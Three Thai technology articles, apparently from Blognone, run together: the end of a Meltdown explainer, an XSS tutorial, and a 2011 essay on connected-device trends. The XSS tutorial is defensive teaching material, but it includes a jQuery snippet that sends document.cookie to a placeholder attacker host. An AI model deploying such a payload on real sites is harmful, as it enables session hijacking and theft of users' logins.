โค้ดพยายามเข้าถึงหน่วยความจำส่วนที่ไม่ได้รับอนุญาต โดยอาศัยตัวแปร `untrusted_offset_from_caller` เมื่อค่าตำแหน่งผิดไป หากโหลดหน่วยความจำจากคำสั่ง `value = arr1->data[untrusted_offset_from_caller]` ขึ้นมาจริง ระบบปฎิบัติการก็จะปิดโปรแกรมลง เนื่องจากละเมิดการจำกัดสิทธิ์การเข้าถึงหน่วยความจำ อย่างไรก็ดี เนื่องจากซีพียูพยายามรันคำสั่งไปล่วงหน้า ค่าในหน่วยความจำนี้จะถูกอ่านขึ้นมา และถูกคำนวณต่อไปโดยที่ตัวโปรแกรมจริงๆ ยังไม่รับรู้ และคำนวณหาค่าตัวแปร `index2` (บรรทัดที่ 11) ต่อไปทันที หากค่าในตัวแปร `value` มีบิตสุดท้ายเป็น 0 ค่า `index2` จะมีค่าเป็น 0x200 หากเป็น 1 จะเป็น 0x300 หลังจากนั้นกระบวนการรันคำสั่งล่วงหน้าจะโหลดหน่วยความจำตามบรรทัดที่ 13 ขึ้นมารอเอาไว้ เนื่องจากค่าตัวแปร `untrusted_offset_from_caller` เป็นค่าที่ไม่ถูกต้อง เช่น ค่าใหญ่เกินไปมากจนเกินขอบเขตหน่วยความจำซอฟต์แวร์ ทำให้ตัวโปรแกรมเหมือนไม่เคยรันโค้ดบรรทัดที่ 9-15 แต่อย่างใด แต่เนื่องจากระบบการรันคำสั่งล่วงหน้าของซีพียูได้รันคำสั่งเหล่านี้ไปแล้ว (และทิ้งผลลัพธ์ทั้งหมดไป) ทำให้หน่วยความจำของ `arr2->data` ถูกโหลดขึ้นแคชทิ้งเอาไว้ การโจมตี Meltdown อาศัยพฤติกรรมนี้ สร้างโปรแกรมที่หลอกล่อให้ซีพียูโหลดหน่วยความจำในส่วนที่ไม่ได้รับอนุญาตขึ้นมาดูค่าซ้ำๆ ไปเรื่อยๆ แล้วค่อยๆ สังเกตุพฤติกรรมเพื่ออ่านค่าในหน่วยความจำส่วนที่ไม่ได้รับอนุญาตให้อ่าน กระบวนการนี้เป็นกระบวนการที่ช้า Project Zero รายงานว่าสามารถอ่านหน่วยความจำเคอร์เนลได้ด้วยอัตรา 2 KB/s ขณะที่ทีมวิจัยจาก Graz University of Technology สามารถปรับปรุงโดยใช้ชุดคำสั่ง TSX ของอินเทลจนเร่งความเร็วการอ่านหน่วยความจำได้ถึง 503 KB/s ### คนทั่วไปควรทำอย่างไรเพื่อรับมือกับ Meltdown สำหรับผู้ใช้ทั่วไป เพียงแค่รออัพเดตแพตช์จากผู้ผลิตก็สามารถป้องกันตนเองจาก Meltdown ได้เช่นเดียวกับช่องโหว่อื่นทั่วไป อย่างไรก็ดีแพตช์ที่ออกมาจะกระทบต่องานบางประเภทมากเป็นพิเศษ โดยเฉพาะงานฐานข้อมูลอย่าง PostgreSQL ทางลดผลกระทบหากใช้ซีพียูรุ่นใหม่ๆ ที่มีฟีเจอร์ PCID (Process-Context Identifiers) จะช่วยลดผลกระทบไปได้มาก รายงานทดสอบ PostgreSQL ระบุว่าหากใช้ PCID สามารถลดผลกระทบจาก 23% เหลือ 17% ในการทดสอบที่แย่ที่สุด (อีกการทดสอบหนึ่งเมื่อเปิด PCID ผลกระทบอยู่ที่ 7%) Phoronix ทดสอบงานรูปแบบต่างๆ ที่ได้รับผลกระทบจากแพตช์ KPTI ที่แก้การโจมตี Meltdown พบว่า[เกมนั้นแทบไม่มีผลกระทบใดๆ](https://www.phoronix.com/scan.php?page=article&item=nvidia-linux-kpti&num=2) รวมไปถึง[งานตกแต่งรูปภาพ](https://www.phoronix.com/scan.php?page=article&item=linux-kpti-pcid&num=1) (ทดสอบด้วย Darktable) โดยทั่วไปแล้วสำหรับผู้ใช้เดสก์ทอปคงแทบไม่มีอะไรต้องกังวล
# Cross Site Scripting: อันตรายใกล้ตัวของคนใช้เว็บ **คำเตือน**: บทความในชุดการรักษาความปลอดภัยคอมพิวเตอร์ มีจุดประสงค์หลักเพื่อการศึกษา และการระมัดระวังของนักพัฒนา การทดสอบต้องทำในสภาพแวดล้อมปิดเท่านั้น (ตั้งเซิร์ฟเวอร์เฉพาะเอง ทดสอบเสร็จแล้วปิดบริการ) **ห้ามทดสอบในเว็บจริงที่ให้บริการอยู่** หากผมทราบว่าสมาชิก Blognone มีการทดลอง โทษคือแบนถาวรอย่างเดียวไม่ว่าจะเกิดความเสียหายหรือไม่ [ต่อจาก CSRF](https://www.blognone.com/node/37959) ปัญหาความปลอดภัยในเว็บที่พบได้มาก แต่ปัญหาอีกอย่างหนึ่งที่พบได้และมักมีอันตรายมากกว่าคือปัญหาความปลอดภัย Cross Site Scripting (XSS หรือบางครั้งเรียกว่า CSS) ที่เป็นช่องให้แฮกเกอร์สามารถนำสคริปต์อยากที่แฮกเกอร์ต้องการไปวางบนหน้าเว็บเป้าหมายได้ ปัญหา XSS เกิดจากเมื่อเว็บรับข้อมูลจากผู้ใช้โดยไม่มีการกรองสคริปต์ออกจากอินพุตของผู้ใช้ก่อน ไม่ว่าจะเป็นการรับผ่านยูอาร์แอล หรือจะรับผ่านแบบฟอร์มต่างๆ การรันสคริปต์ได้ทำให้ทำให้แฮกเกอร์สามารถขโมยข้อมูลที่ควรเป็นความลับของผู้ใช้ เช่น คุกกี้ที่เป็นความลับสำหรับการล็อกอิน ตัวอย่างเช่นการวางคอมเมนต์ในเว็บๆ หนึ่ง หากผู้ใช้สามารวางสคริปต์ ``` $("#hackingimage").attr('src',"<http://hackingserver.example/hacked.png?cookie=>"+document.cookie); ``` ตัวอย่างเช่นนี้ (ตัวอย่างในกรณีที่ใช้ jquery) ทำให้แฮกเกอร์ที่สร้างเซิร์ฟเวอร์เพื่อรับ request รูปภาพที่เบราว์เซอร์ของเหยื่อส่งออกไป โดยส่งข้อมูลคุกกี้ทั้งหมดออกไปด้วย ### การป้องกัน การป้องกันปัญหาความปลอดภัย XSS อาศัยการกรองอินพุตจากผู้ใช้เป็นหลัก โดยอินพุตต่างๆ ไม่ควรถูกนำมาใช้งานในทันที แต่ต้องมีการกรองก่อนทุกครั้ง และต้องมั่นใจได้ว่าผู้ใช้ไม่สามารถวางสคริปต์ใดๆ ลงในเว็บได้ ค่าความปลอดภัยเริ่มต้นของ CMS หลายตัวมักตั้งค่าความปลอดภัยสำหรับ XSS ไว้เป็นอย่างดีแล้ว ตัวอย่างในกรณีของ Drupal นั้นจะกำหนด filtered HTML สำหรับผู้ใช้ทั่วไป และ full HTML สำหรับผู้ใช้ที่วางใจได้เท่านั้น โดย filtered HTML จะปิดไม่ให้ผู้ใช้สามารถวางสคริปต์ใดๆ ลงในแบบฟอร์มได้ หรือหากวางได้ก็จะแสดงผลเป็นโค้ดไปยังหน้าเว็บ ไม่ได้เป็นสคริปต์ที่รันได้ ซึ่งการกรองเหล่านนี้ไม่ใช่เพียงแท็ก script เท่านั้นแต่รวมไปถึง attribute หลายตัว เช่น onload, onclick รวมเป็น Event Handler ทั้งหมด 94 กรณี และ CSS ในบางกรณีอีกด้วย (ดูรายการตรวจสอบ XSS ได้ใน [OWASP](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)) ระบบป้องกันจำพวก Intrusion Detection System (IDS) หลายตัวมีความสามารถในการตรวจจับว่าผู้ใช้พยายามโพสสคริปต์เข้ามายังเว็บหรือไม่ ทำให้สามารถแจ้งเตือนได้แต่เนิ่นๆ ว่ามีความพยายามทดสอบว่าเว็บมีการรักษาความปลอดภัยที่ดี ทุกวันนี้การวางข้อมูลจากเว็บอื่นๆ เช่น กรณีของ YouTube นั้นได้รับความนิยมเป็นอย่างมาก นักพัฒนาต้องระวังว่าการเปิดเว็บให้รองรับการวางข้อมูลเหล่านี้ไม่ใช่เรื่องสำคัญที่สุด บางเว็บเช่น Twitter กลับพยายามให้ผู้ใช้ปล่อยให้ใช้แท็ก script เพื่อจะแสดงผลได้ถูกต้อง กรณีแบบนี้ควรระวังที่จะไม่ยอมรับการแสดงผลแบบนี้หรือหากยอมรับก็ต้องมีการกรองเพิ่มเติมอย่างระมัดระวัง ในฝั่งเบราว์เซอร์เอง เบราว์เซอร์ยุคใหม่ล้วนมีความสามรถในการวิเคราะห์โค้ดที่มีความพยายามโจมตีด้วย XSS กันมากขึ้นเรื่อยๆ เช่น การฝังสคริปต์ไว้ในยูอาร์แอล แต่ความสามารถเหล่านี้ก็ยังจำกัดอยู่มาก ความรับผิดชอบจึงตกกับนักพัฒนาเว็บเป็นหลัก XSS และ CSRF เป็นปัญหาความปลอดภัยสำคัญที่เป็นความรับผิดชอบของนักพัฒนาเว็บโดยตรงที่จะป้องกันปัญหาเปล่านี้ ความระมัดระวังในทุกๆ อินพุตเป็นสิ่งสำคัญมาก เมื่อเรากำลังให้บริการทั้งโลกที่ไม่แน่ใจว่ามีใครพยายามทำอะไรอยู่บ้าง นักพัฒนาที่ยังไม่คุ้นชินกับการพัฒนาเว็บเช่นนี้ ควรเรียนรู้บทเรียนที่นักพัฒนารุ่นก่อนล้วนได้ประสบเจอกันมาก่อนแล้ว เฟรมเวิร์คและ CMS สำหรับการพัฒนาเว็บทั้งหลายล้วนเป็นผลของการสะสมประสบการณ์เหล่านี้เป็นอย่างดี อย่างเช่น [Django](https://docs.djangoproject.com/en/dev/topics/security/) หรือ [CodeIgnitor](http://codeigniter.com/user_guide/libraries/security.html) ผมยังคงย้ำว่าในยุคนี้หากไม่ใช่ผู้เชี่ยวชาญเฉพาะทางแล้ว เราไม่ควรพัฒนาเว็บจากการเขียน php บรรทัดแรกด้วยตัวเองเหมือนแต่เดิมอีกต่อไป
# The New Dawn of Computing มาถึงวันนี้คงไม่มีใครปฏิเสธแล้วว่า การเกิดขึ้นของ "อุปกรณ์ชนิดใหม่ๆ ที่ต่อเชื่อมกับอินเทอร์เน็ตได้" (connected devices) ไม่ว่าจะเป็นมือถือ แท็บเล็ต เครื่องอ่านอีบุ๊ก ทีวี เกมคอนโซล หรือแม้กระทั่งรถยนต์ ที่เชื่อมประสานร้อยเรียงกับเซิร์ฟเวอร์บนกลุ่มเมฆ กำลังทำให้นิยามของคำว่า "คอมพิวเตอร์" เปลี่ยนไปอีกครั้งหนึ่ง หลังจากที่เคยเปลี่ยนมาแล้วหลายครั้ง เนื่องในโอกาสขึ้นปีใหม่ ผมเลยอยากเขียนถึง "ประวัติศาสตร์บทใหม่" ของโลกไอทีที่กำลังจะเริ่มขึ้นอีกครั้ง (จริงๆ อาจจะเริ่มไปแล้วด้วยซ้ำ) งานเขียนชิ้นนี้จะไม่ลงรายละเอียดในระดับผลิตภัณฑ์ แต่จะมองภาพรวมว่ากำลังมีแนวโน้มใดก่อตัวขึ้นบ้าง และเรามีปัญหาอะไรรอคอยอยู่เบื้องหน้า ### 1\. พีซียังไม่หายไปไหน แม้ว่า "กระแส" ของอุปกรณ์ชนิดใหม่ๆ จะมาแรงมากแค่ไหน มันก็เป็นตลาดใหม่ที่เพิ่งเกิดขึ้น ไม่ได้มาเบียดแย่งตลาดเก่ากับพีซี (ในที่นี้รวมถึงโน้ตบุ๊กและเน็ตบุ๊ก) ให้ตายจากเราไป ตลาดไอทีกำลังอยู่ในภาวะขยายตัว ยังมีที่ว่างพอสำหรับอุปกรณ์ทุกชนิดที่พิสูจน์แล้วว่าตอบโจทย์ ตราบใดที่มนุษย์ยังไม่สามารถประดิษฐ์วิธีการป้อนข้อมูลที่เหนือกว่า แม่นยำกว่า สะดวกกว่าคีย์บอร์ดได้ การใช้พีซีจะยังเป็นสิ่งจำเป็นต่อไป อย่างไรก็ตาม พีซีจะเริ่มสูญเสียภาวะความเป็นเจ้าตลาดหรือ dominant position จากเดิมที่ คอมพิวเตอร์คือพีซี ก็กลายเป็นว่าคอมพิวเตอร์คืออุปกรณ์ใด ๆ ที่ต่อเน็ตได้ งานบางอย่างที่ใช้อุปกรณ์อื่นแทนได้ ก็จะถูกโอนถ่ายมาทำบนอุปกรณ์อื่นๆ แทนบ้าง ทุกวันนี้ก็เห็นกันอยู่แล้วกับการท่องเว็บบนแท็บเล็ต หรือทวีตด้วยมือถือ ผู้สร้างเนื้อหาหรือแอพพลิเคชันจะตีกรอบตัวเองเฉพาะพีซีไม่ได้อีกแล้ว เอาง่ายๆ ต่อจากนี้ไป คนทำเว็บจะต้องมองให้ทะลุกรอบเบราว์เซอร์บนพีซีแบบเดิม ไปยังการแสดงเว็บให้เหมาะกับจอขนาดอื่นๆ ทั้งแท็บเล็ต มือถือ ทีวี และเกมคอนโซล ### 2\. เราจะอยู่ในโลกที่กระจัดกระจาย (fragmented world) ต่อจากข้อแรก ยิ่งเรามีอุปกรณ์มากชนิดเท่าไร ภาระในการตอบสนองต่ออุปกรณ์เหล่านี้ก็ยิ่งมากขึ้นเท่านั้น เป็นไปไม่ได้ที่เราจะสร้างเว็บหรือแอพที่ใช้งานได้ดีเยี่ยมบนทุกแพลตฟอร์ม เจ้าของเนื้อหาหรือแอพพลิเคชันจะต้องหาจุดสมดุลที่เหมาะสมระหว่างฐานผู้ใช้ กับต้นทุนในการพัฒนาและดูแลรักษา อีกไม่กี่ปีข้างหน้า แพลตฟอร์มคอมพิวเตอร์ต่างๆ จะต้องต่อสู้ช่วงชิงกันอย่างหนักหน่วง เพื่อรักษา "โมเมนตัม" ของตัวเองเอาไว้ แพลตฟอร์มใหญ่ๆ อย่างวินโดวส์พีซี หรืออุปกรณ์พกพาที่ใช้ iOS คงไม่มีปัญหามากนัก แต่แพลตฟอร์มระดับรองลงมาอย่างลินุกซ์พีซี, Chrome OS หรือ Windows Phone อาจจะเหนื่อยกันหน่อยถ้าอยากอยู่รอดต่อไปได้ หลังจากการต่อสู้ที่ว่า แพลตฟอร์มต่างๆ จะเริ่มควบรวมกันและลดจำนวนลง อันนี้เป็นธรรมชาติของวงการไอทีมาทุกยุคทุกสมัย (ถ้าอธิบายด้วยหลักทางเศรษฐศาสตร์ก็คือ การมีจำนวนแพลตฟอร์มมาก ทำให้ต้นทุนในการรักษาทุกแพลตฟอร์มให้คงอยู่นั้นมากเกินไป) แพลตฟอร์มที่อ่อนแอจะบาดเจ็บล้มตาย ดังที่เคยเกิดมาแล้วกับ OS/2, BeOS, DreamCast และอื่นๆ ตอนนี้แพลตฟอร์มที่เป็นไปได้สูงว่าจะอยู่ต่อไปได้คือ วินโดวส์/พีซี, Mac/iOS ที่จะหลอมรวมกันมากขึ้นเรื่อยๆ และ Android/Mobile ถ้ามองว่าตลาดมีพื้นที่ได้สำหรับผู้เล่นประมาณ 5 ราย ก็แปลว่าที่ว่างที่เหลือมีไม่เยอะเท่าไรนัก ### 3\. โซลูชันในการพัฒนาแบบข้ามแพลตฟอร์ม ด้วยภาวะ fragmentation ของแพลตฟอร์มแบบนี้ จะเป็นโอกาสให้คนที่สามารถสร้างเครื่องมือในการถ่ายทอดเนื้อหาแบบข้ามแพลตฟอร์มกันได้ (ในอดีต Java เคยพยายามมาแล้วแต่ไม่สำเร็จ) ผมคิดว่า ณ ตอนนี้มีตัวเลือกที่เข้าข่ายเพียง 2 อย่าง คือ 1. Web runtime - มองว่าเบราว์เซอร์เป็นรันไทม์ แล้วทำทุกอย่างเป็นเว็บแอพพลิเคชัน เทคโนโลยีอย่าง HTML5 และ JavaScript Engine จะทำลายข้อจำกัดของเว็บแบบเดิมๆ ลงไป ส่วนรันไทม์ตัวสำคัญคงหนีไม่พ้น WebKit ที่จะไปอยู่ทุกหนทุกแห่ง 2. Flash/AIR - ช่วง 2-3 ปีข้างหน้าคงจะเป็นจุดเปลี่ยนสำคัญของ Adobe ว่าจะสามารถรักษาโมเมนตัมของตัวเองได้แค่ไหน ต้องเอา Flash/AIR ไปลงให้มากแพลตฟอร์มที่สุด ด้วยประสิทธิภาพที่ยอมรับได้ เครื่องมือทั้งสองอย่างไม่ได้มีตลาดซ้อนทับกันทั้งหมด น่าจะอยู่ต่อไปได้ทั้งคู่ ในฐานะทางเลือกราคาถูกในการพัฒนาแอพพลิเคชันให้ใช้ได้บนอุปกรณ์มากชนิด (อนาคตอันใกล้ เราคงมีวิธีการที่ดีกว่านี้สำหรับการแสดงผลเนื้อหาเดียวกันบนอุปกรณ์ต่างกัน เช่นเดียวกับที่ CMS เกิดขึ้นมาเพื่อตอบโจทย์คล้ายๆ กันนี้) ส่วนเครื่องมือที่ผูกกับแพลตฟอร์ม เช่น Objective-C หรือ Silverlight ก็คงมีชีวิตผูกกับแพลตฟอร์มของตัวเอง ถ้าแพลตฟอร์มใหญ่จริงก็คงอยู่ต่อไปได้ไม่มีปัญหาอะไร ### 4\. เครือข่ายและก้อนเมฆ อำนาจในการควบคุมข้อมูล พลังของเครือข่ายและเทคโนโลยีด้าน cloud computing จะผลักดันให้เรานำข้อมูลไปเก็บบนอินเทอร์เน็ตมากขึ้น ซึ่งจะช่วยแก้ปัญหาหลายๆ อย่าง เช่น การแบ็คอัพ การเข้าถึงข้อมูล ต้นทุนในการเก็บข้อมูล ฯลฯ แต่ก็จะสร้างปัญหาใหม่อีกหลายอย่างเช่นกัน โดยเฉพาะประเด็นเรื่อง "อำนาจในการควบคุม" ข้อมูล เช่น - ความเป็นส่วนตัว: ผู้ให้บริการจะแอบดูข้อมูลของเราหรือไม่ เอาข้อมูลไปให้คนอื่นหรือเปล่า - การเข้าถึงข้อมูล: ประเด็นอย่าง net neutrality เป็นตัวอย่างที่ดี เราอาจจะเข้าถึงข้อมูลของเราได้ครบถ้วน แต่ถ้าจ่ายเพิ่มอาจจะโหลดได้เร็วกว่าปกติ? นอกจากนี้เรื่องของ availability ก็สำคัญ ปัญหา Facebook/Twitter/Skype ล่มก็เป็นตัวอย่างที่เป็นรูปธรรม เห็นชัดอยู่แล้ว - การถือครองข้อมูล: ข้อมูลยังเป็นของเราหรือไม่ ถ้าอยากสั่งลบข้อมูลบางอย่าง จะทำได้ดั่งใจแค่ไหน ผู้ให้บริการจะปิดกิจการหนีหรือเปล่า นอกจากระดับอินเทอร์เน็ตแล้ว การแลกเปลี่ยนข้อมูลในระดับ personal network ก็น่าสนใจเช่นกัน เช่น ถ้าผมมีมือถือ แท็บเล็ต เครื่องเล่นเกม โน้ตบุ๊ก เน็ตบุ๊ก ฯลฯ รวมกันทั้งหมด 10 ชิ้นในบ้านเดียวกัน วิธีที่ดีที่สุดในการแลกเปลี่ยนข้อมูลกันระหว่างอุปกรณ์เหล่านี้คืออะไรกันแน่ เราควรเก็บทุกอย่างไว้บนอินเทอร์เน็ตภายนอกบ้าน แล้วส่งกลับไปมาทุกครั้งอย่างนั้นหรือ? หรือเราควรมีเซิร์ฟเวอร์กลางในบ้าน? หรือจะใช้การแลกเปลี่ยนข้อมูลแบบ ad hoc ระหว่างอุปกรณ์แต่ละชิ้น? ผมคิดว่านี่เป็นโจทย์ที่จะต้องตอบกันในเร็วๆ นี้ ### 5\. วิธีใหม่ๆ ในการปฏิสัมพันธ์กับคอมพิวเตอร์ เราใช้คีย์บอร์ดและเมาส์กันมานานหลายสิบปี แต่ 3-4 ปีให้หลังนี้ วิธีการปฏิสัมพันธ์ (interaction) กับคอมพิวเตอร์แบบใหม่ๆ เริ่มปรากฎให้เห็นในชีวิตประจำวันมากขึ้น ไม่ว่าจะเป็นการใช้นิ้วสัมผัส (สมาร์ทโฟน, แท็บเล็ต, Nintendo DS), motion control (Wii/PlayStation Move), การสั่งงานด้วยเสียง (Voice Actions บน Android), body gesture (Kinect) กล้องถ่ายภาพ (พวก augmented reality ต่างๆ) เทคโนโลยีเหล่านี้อาจใช้งานได้สำหรับงานเฉพาะของตัวเอง (เช่น การเล่นเกมด้วย Kinect หรือสั่งให้ค้นหาข้อมูลด้วย Voice Actions) แต่สุดท้ายแล้ว ก็ต้องขึ้นไปท้าทายกับเมาส์และคีย์บอร์ดว่าจะสามารถทดแทนกันได้อย่างสมบูรณ์หรือไม่ เทคโนโลยีบางอย่างเป็นเทคโนโลยีที่เกี่ยวข้องกับภาษา เช่น Voice Actions หรือการใช้คีย์บอร์ดบนจอสัมผัส ซึ่ง**จะมีปัญหากับภาษาไทยแน่นอน** นี่อาจเป็นโอกาสอันดีที่จะประดิษฐ์วิธีการป้อนข้อมูลภาษาไทยแบบใหม่ๆ (เช่น คีย์บอร์ดภาษาไทยของ BlackBerry หรือคีย์บอร์ดจอสัมผัสอย่าง TSwipe) แต่ในขณะเดียวกัน เราก็ต้องพัฒนาเทคโนโลยีด้านภาษาให้ก้าวตามกระแสโลกให้ทัน (เช่น ซอฟต์คีย์บอร์ด QWERTY บน WP7 หรือ Voice Actions ที่รองรับภาษาไทย) ### 6\. Location ผมคิดว่า location จะเป็นปัจจัยสำคัญในการเชื่อมโลกไซเบอร์ ให้กลับมา "ซ้อนทับ" กับโลกความเป็นจริงทางกายภาพอีกครั้ง ทุกวันนี้บริการอย่าง Foursquare ก็เริ่มแสดงให้เราเห็นแล้วว่ามันมีศักยภาพขนาดไหน อย่างไรก็ตาม กว่า location จะไปถึงจุดนั้นได้ ต้องแก้ปัญหาพื้นฐานหลายอย่างให้ได้เสียก่อน - ความง่ายและแม่นยำในการระบุพิกัด: ทุกวันนี้การหาพิกัดผ่านมือถือยังยุ่งยากเกินไป เช่น ต้องเปิด GPS ก่อน, ประเทศไทยมีอาคารในร่มเยอะ GPS จับสัญญาณไม่ได้, ข้อมูลสถานที่ยังมีน้อยและไม่ครบถ้วน ฯลฯ - ความเป็นส่วนตัว: ผู้ใช้จะสะดวกใจมากน้อยแค่ไหนในการเปิดเผยพิกัดของตัวเอง - ความปลอดภัย: ทุกวันนี้เริ่มมีปัญหาอาชญากรรมจาก location บ้างแล้ว ถ้าไม่สามารถสร้างหลักประกันความปลอดภัยได้ ก็ไม่มีใครกล้าใช้จริงจัง - บริการที่คู่ควร: อะไรคือแรงจูงใจที่เราควรเปิดเผยพิกัดของตนเอง แค่เพียงจะได้ badge หรือส่วนลดเล็กๆ น้อยๆ นั้นยังไม่น่าจะพอ ### 7\. Economy of Scale การผูกขาดด้วยขนาด วงการไอทีมีลักษณะเฉพาะอยู่อย่างหนึ่งคือ winner takes (nearly) all ผู้ชนะในศึกใดๆ จะเติบใหญ่จนครองส่วนแบ่งตลาดเกือบทั้งหมด (ตัวอย่างที่โดดเด่นในเรื่องนี้คือไมโครซอฟท์ในตลาด OS หรือกูเกิลในตลาด search) พอมาเป็นโลกในยุค cloud คุณลักษณะเฉพาะนี้ยิ่งเด่นชัดมากขึ้น ด้านหนึ่ง เมื่อบริการออนไลน์ของเราเริ่มบูม ผู้ใช้เพิ่มจำนวนขึ้น แม้จะเป็นเรื่องดี แต่ก็มีปัญหาเรื่องโหลดของเซิร์ฟเวอร์ตามมา และถ้าเรามีผู้ใช้ระดับสิบล้านคน ร้อยล้านคน ค่าใช้จ่ายในเรื่องต่างๆ ไม่ว่าจะเป็นตัวเงิน แรงคน ย่อมเพิ่มสูงตามไปด้วย เมื่อค่าใช้จ่ายนี้เพิ่มสูงขึ้นไปยังระดับที่บริษัทธรรมดาไม่สามารถรับไหว ก็จะบีบให้ผู้เล่นในตลาดเหลือเพียงแค่ "รายใหญ่" เท่านั้น ขนาดเว็บไซต์วิดีโอ "รายใหญ่" อย่าง YouTube เอง ยังไม่สามารถอยู่ได้เพียงลำพัง ถ้าไม่มีกูเกิลช่วยชดเชยค่าแบนด์วิธให้ ไม่มีเซิร์ฟเวอร์ฟาร์มของกูเกิล YouTube ก็คงอยู่ไม่ได้มาถึงขนาดนี้ อีกตัวอย่างที่ชัดเจนก็คือบริการอีเมลขององค์กร ผู้ให้บริการรายเล็กต้องล้มหายตายจากไปมาก เมื่อเจอกับคู่แข่งอย่าง Google Apps ที่รุกเข้ามาด้วยฟีเจอร์ที่เหนือกว่า อัพไทม์ที่ดีกว่า ในราคาที่เท่ากันหรืออาจจะถูกกว่าด้วยซ้ำ นอกจากค่าใช้จ่ายด้านโครงสร้างที่กล่าวไปแล้ว ก็ยังมีค่าใช้จ่ายด้านอื่นๆ อีกมาก เช่น ค่าวิจัย ค่าออกแบบ ต้นทุนทางสังคมที่ใช้ดึงดูดวิศวกรระดับหัวให้มาร่วมงานด้วย ฯลฯ ยังไงเสีย HTC หรือ LG ก็ย่อมมีกองทัพวิศวกรที่เหนือกว่า Welcomm หรือ i-Mobile อย่างเทียบไม่ติด แต่กลับแข่งขันในตลาดเดียวกัน ที่กูเกิล (และบริษัทระดับเดียวกันอย่างไมโครซอฟท์หรือแอปเปิล) ทำแบบนี้ได้ ก็เพราะ economy of scale ที่เกิดจากความใหญ่ของบริษัทเอง ช่วยกดให้ค่าใช้จ่ายต่อหัวต่ำลงมากๆ ท้ายที่สุดแล้วบริษัทเล็กจะแข่งไม่ได้ และบริษัทขนาดใหญ่ก็จะใหญ่ขึ้นไปเรื่อยๆ จากการผูกขาดด้วยขนาดและการควบรวม แน่นอนว่ามีบริษัทอย่าง Facebook หรือ Twitter ที่อาศัยช่องว่างทางการตลาดเติบโตขึ้นมาได้ แต่ก็มีบริษัทไม่ดังอีกจำนวนมากกว่ามากที่ล้มหายตายจากไป คำถามก็คือบริษัทไทยจะอยู่ได้อย่างไร ยามที่โลกาภิวัฒน์และอินเทอร์เน็ต บีบให้เราต้องแข่งกับบริษัทข้ามชาติขนาดใหญ่อย่างนี้ ### 8\. โมเดลธุรกิจแบบใหม่ กับกระบวนการจ่ายเงินแบบเดิม? การเกิดขึ้นของอุปกรณ์แบบใหม่ๆ บริการแบบใหม่ๆ ย่อมทำให้เกิดโมเดลการทำเงินแบบใหม่ๆ ตามไปด้วย ตัวอย่างที่ประสบความสำเร็จก็อย่างเช่น ระบบโฆษณาของกูเกิล, การขายแอพของแอปเปิล, การเก็บค่าสมาชิกของ Netflix และ Xbox Live, การขายหนังสือผ่าน Whispernet ปี 2011 นี้เราจะพบเห็นการทดลองโมเดลธุรกิจแบบใหม่ๆ อีกมาก ไม่ว่าจะเป็นการขายนิตยสารออนไลน์ผ่านแท็บเล็ต, การจ่ายเงินเพื่อซื้อ "ทวีต" ที่โดดเด่น, การขายไอเทมในเกมบน social network ฯลฯ ซึ่งก็จะมีทั้งวิธีที่เวิร์คและต้องม้วนเสื่อกลับไป แต่ "รากฐาน" ที่คอยสนับสนุนโมเดลธุรกิจแบบนี้ ก็คือระบบการจ่ายเงิน (payment system) ที่คล่องตัวและปลอดภัย สังคมตะวันตกไม่มีปัญหานี้เพราะคุ้นเคยกับบัตรเครดิต ในขณะที่สังคมออนไลน์ไทยก็เจอปัญหาเรื้อรัง "ลูกค้าไม่มีบัตรเครดิต" ทำให้การจ่ายเงินเพื่อซื้อบริการออนไลน์ไม่เติบโตเท่าที่ควรจะเป็น แม้ว่าจะมีคนเคยลองวิธีการจ่ายเงินแบบใหม่ๆ เช่น Paysbuy หรือการจ่ายเงินผ่านบัตรเติมเงินมือถือ แต่ด้วยเหตุผลหลายๆ อย่างมันกลับไม่ประสบความสำเร็จ และกลับมาตายรังที่การโอนเงินผ่านธนาคาร วิธีพื้นฐานที่อาจจะไม่สะดวกอยู่บ้างแต่ตอบโจทย์ของคนหมู่มาก คำถามคือ วิธีการจ่ายเงินแบบนี้จะยังใช้ได้กับโมเดลธุรกิจแบบใหม่ๆ หรือเปล่า? ผมสามารถ "โอนเงินผ่านธนาคาร" เพื่อซื้อแมกกาซีนบน iPad ได้ไหม? ในอีกไม่ช้า เราจะเห็นการทดลองวิธีการจ่ายเงินแบบใหม่ๆ อีกครั้ง ไม่ว่าจะเป็นการลงบิลค่ามือถือรายเดือน หรือจ่ายผ่านมือถือระบบ NFC แบบในญี่ปุ่น ซึ่ง Nexus S และกูเกิลพยายามจะทำอยู่ ถ้าเรายังไม่สามารถแก้ปัญหาเหล่านี้ได้ การทำเงินจากบริการออนไลน์แบบใหม่ๆ ก็จะยังกระจุกตัวอยู่เฉพาะคนชั้นกลางที่มีบัตรเครดิตเท่านั้น ซึ่งจะกระทบชิ่งมายังผู้ให้บริการของไทยที่เติบโตไม่ได้เพราะฐานลูกค้าไม่มากพอ ### 9\. ปัญหาเรื่อง "พรมแดน" ระหว่างประเทศ หนังสือ Revolutionary Wealth ของ Alvin Toffler เขียนไว้ว่า วงการหรืออุตสาหกรรมแต่ละแห่ง เดินหน้าด้วยความเร็วไม่เท่ากัน และเมื่อเกิดความเหลื่อมล้ำกันระหว่างวงการ ปัญหาก็จะตามมา เช่น ภาคธุรกิจเคลื่อนตัวเร็วจนกลไกภาคราชการออกกฎระเบียบตามไม่ทัน ผู้บริโภคก็จะถูกเอาเปรียบ เป็นต้น ถ้ามองเฉพาะภายในภาคธุรกิจเอง อุตสาหกรรมแต่ละอย่างก็มีจังหวะเร็วช้าที่แตกต่างเช่นกัน ธุรกิจออนไลน์นั้นวิ่งเร็วที่สุด บริการอย่าง Gmail หรือ Facebook ให้บริการคนทั้งโลกพร้อมกัน ได้ฟีเจอร์ใหม่พร้อมกัน แต่ธุรกิจไอทีอื่นๆ อาจจะวิ่งได้ไม่เร็วขนาดนั้น ที่สำคัญคือจังหวะความเร็วของแต่ละประเทศนั้นต่างกันเสียด้วย นี่เลยเป็นเหตุผลว่าทำไมคนไทยดาวน์โหลด iTunes ได้ แต่กลับไม่สามารถซื้อหนังหรือเพลงจาก iTunes ได้ เพราะว่าอุตสาหกรรมเพลงไม่ได้เดินจังหวะเดียวกับอุตสาหกรรมออนไลน์ การขายเพลงมีกระบวนการด้านสัญญา ด้านลิขสิทธิ์ ซึ่งต้องเจรจากันอีกวุ่นวาย นี่เป็นเหตุผลเดียวกับที่ Google Voice ใช้งานนอกสหรัฐลำบาก แม้ว่ามันจะรวมมาในมือถือ Android ที่ขายทั่วโลก เหตุผลก็คือ Google Voice เกี่ยวข้องกับวงการโทรคมนาคม ที่ต้องผ่านการกำกับดูแล 